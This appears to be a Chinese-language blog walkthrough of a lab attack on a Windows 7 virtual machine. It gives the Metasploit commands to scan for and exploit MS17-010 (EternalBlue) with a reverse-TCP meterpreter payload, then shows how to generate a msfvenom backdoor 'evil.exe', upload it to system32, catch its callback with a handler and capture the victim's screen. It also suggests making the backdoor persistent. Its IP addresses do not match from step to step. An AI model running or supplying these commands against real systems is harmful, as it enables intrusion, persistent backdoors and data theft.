一、环境准备
主机 kali :192.168.115.134
靶机win7x64:192.168.115.133
二、渗透
Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793
这里利用的是win7的ms17-010 远程执行漏洞
先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵
先show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip
set RHOSTS 192.168.115.113
接着输入run执行探测
显示表明可以利用该漏洞
开始使用攻击模块
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.115.134
lhost 192.168.115.134
msf exploit(ms17_010_eternalblue) > exploit
成功拿到shell
二、后门程序
1、用msfvenom生成后门程序
参考:https://blog.csdn.net/itest_2016/article/details/76984455
新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。在/root下生成evil.exe文件。
msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe
生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个meterpreter回话。这里我们获得了shell利用upload命令将文件传送到靶C:\windows\system32目录下。注意:目标路径要用\\。
可以看到靶机下已经接收到了后门程序文件。
此时需要现在攻击者的主机上启用监听,来接收来自后门的信息。
注意:我们要断开现在已有的连接
启动监听
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.115.134
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit
被攻陷主机运行后门之后:
注意:可以将后门程序附加在开机启动项或者进程中,这里我们在靶机假装不知道它是后门程序双击启动evil.exe
监控端显示有一个连接
成功得到一个meterpreter会话。
这个时候攻击者就可以通过这个meterpreter来执行系统命令、提权、提取敏感数据、内网横向渗透等操作。(当然我都不会2333)
可以用一个有趣的
参考:https://blog.csdn.net/nzjdsds/article/details/77916706
通过
在/root/AzitvgoJ.jpeg下可以查看到靶机的屏幕截图
非常感谢!!!